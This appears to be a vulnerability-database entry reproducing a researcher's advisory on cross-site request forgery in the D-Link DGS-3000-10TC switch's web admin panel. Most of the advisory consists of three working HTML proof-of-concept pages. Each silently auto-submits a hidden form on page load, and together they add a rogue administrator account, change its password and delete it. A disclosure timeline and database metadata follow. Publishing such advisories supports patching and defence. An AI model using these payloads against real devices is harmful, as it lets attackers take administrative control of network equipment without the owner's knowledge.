ID
VAR-E-201802-0498
TITLE
D-Link DGS-3000-10TC Cross Site Request Forgery
Trust: 0.5
DESCRIPTION
D-Link DGS-3000-10TC with firmware 2.00.006 suffers from a cross site request forgery vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | d link | model: | dgs-3000-10tc | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
Hello list!
There are Cross-Site Request Forgery vulnerabilities in D-Link
DGS-3000-10TC. In previous advisory I wrote about Cross-Site Scripting and
Content Spoofing vulnerabilities.
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: D-Link DGS-3000-10TC, Firmware Version
2.00.006. All other versions also must be vulnerable.
----------
Details:
----------
Cross-Site Request Forgery (WASC-09):
Admin panel has CSRF vulnerabilities in all functionality. E.g. in this
functionality.
Add new admin:
D-Link DGS-3000-10TC CSRF-1.html
<html>
<head>
<title>D-Link DGS-3000-10TC CSRF exploit (C) 2017 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/form/userAccountSettingForm"
method="post">
<input type="hidden" name="h_flag" value="0">
<input type="hidden" name="T1" value="hacker">
<input type="hidden" name="T5" value="password">
<input type="hidden" name="operation" value="add">
<input type="hidden" name="S2" value="Admin">
<input type="hidden" name="T6" value="password">
</form>
</body>
</html>
Change password in new admin:
D-Link DGS-3000-10TC CSRF-2.html
<html>
<head>
<title>D-Link DGS-3000-10TC CSRF exploit (C) 2017 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/form/userAccountSettingForm"
method="post">
<input type="hidden" name="username" value="hacker">
<input type="hidden" name="acc_right" value="Admin">
<input type="hidden" name="h_flag" value="0">
<input type="hidden" name="operation" value="modify">
<input type="hidden" name="password" value="password">
<input type="hidden" name="new_password" value="password1">
<input type="hidden" name="confirm_password" value="password1">
</form>
</body>
</html>
Delete new admin:
D-Link DGS-3000-10TC CSRF-3.html
<html>
<head>
<title>D-Link DGS-3000-10TC CSRF exploit (C) 2017 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/form/userAccountSettingForm"
method="post">
<input type="hidden" name="T1" value="hacker">
<input type="hidden" name="operation" value="del">
</form>
</body>
</html>
------------
Timeline:
------------
2014-2018 - informed developers about multiple vulnerabilities in this and
other D-Link devices.
2017.08.28 - informed about it one USA company with bug bounty program -
they were interested in this device, but not in these vulnerabilities. Later
informed D-Link about them.
2017.10.28 - disclosed at my site (http://websecurity.com.ua/8720/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
csrf
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | csrf | Trust: 0.5 |
CREDITS
MustLive
Trust: 0.5
EXTERNAL IDS
db: | PACKETSTORM | id: | 146612 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 146612 |
LAST UPDATE DATE
2022-07-27T09:58:22.193000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 146612 | date: | 2018-02-28T13:33:33 |